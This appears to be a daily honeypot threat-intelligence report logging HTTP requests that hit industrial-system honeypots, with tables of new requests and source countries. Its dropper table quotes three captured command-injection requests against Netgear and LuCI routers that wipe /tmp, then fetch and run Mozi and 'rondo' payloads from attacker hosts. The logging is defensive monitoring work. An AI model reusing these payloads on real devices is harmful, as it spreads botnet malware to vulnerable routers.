Skip to main content
  1. Daily-Posts/

Report: 2025-08-19

·327 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-19
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 16 new requests that have never been observed before (these were added to the monitored request database.).

A total of 826 requests were recorded during the day, originating from 3 different countries, with a peak of 458 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
DEGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
1.70.13.22GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://1.70.13.22:38117/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
117.11.140.215GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.11.140.215:58211/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
45.156.87.165GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
205POST /cn/cmd HTTP/1.1
1142\x10\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00
1331\x00\x0E8\xD0s\xCA\xDDKk\xF4b\x00\x00\x00\x00\x00
1981GET /api/me HTTP/1.1
2781\x00\x0E8\xC8MiT/\xB4\x98\x14\x00\x00\x00\x00\x00
2831GET /OdinHttpCall1755631302 HTTP/1.1
2841GET /Odin/http/call1755631302 HTTP/1.1
2851GET /odinhttpcall1755631302 HTTP/1.1
3161\x00\x0E\x08\x08\x02\xDE%\x957\xBB?\x00\x00\x00\x00\x00
3171\x00\x0E8\x08\x02\xDE%\x957\xBB?\x00\x00\x00\x00\x00
3181\x00\x0E\x08n\xFB\xB8\xD0\xF8p\x96c\x00\x00\x00\x00\x00
3191\x00\x0E8n\xFB\xB8\xD0\xF8p\x96c\x00\x00\x00\x00\x00
3201\x00\x0E\x08\x03pHAP)QQ\x00\x00\x00\x00\x00
3211\x00\x0E8\x03pHAP)QQ\x00\x00\x00\x00\x00
3221\x00\x0E\x08\xC4->\xCA\xCB\x17\x8E\x90\x00\x00\x00\x00\x00
3231\x00\x0E8\xC4->\xCA\xCB\x17\x8E\x90\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0458US
182GB
246AR
346IR
443DE
522NL
619SC
718BG
812CN
912HK
1011SA
119ZA
128IN
136HU
146LT
153TR
162BE
172AE
182SG
192VN
202PH
212LU
222CH
232PL
241KR
251MY
261PA
271EE
281RU
291ID
301CA
311BR
321CZ

Related

Report: 2025-08-18
·1246 words
Repport Daily
Report: 2025-08-17
·2205 words
Repport Daily
Report: 2025-08-16
·329 words
Repport Daily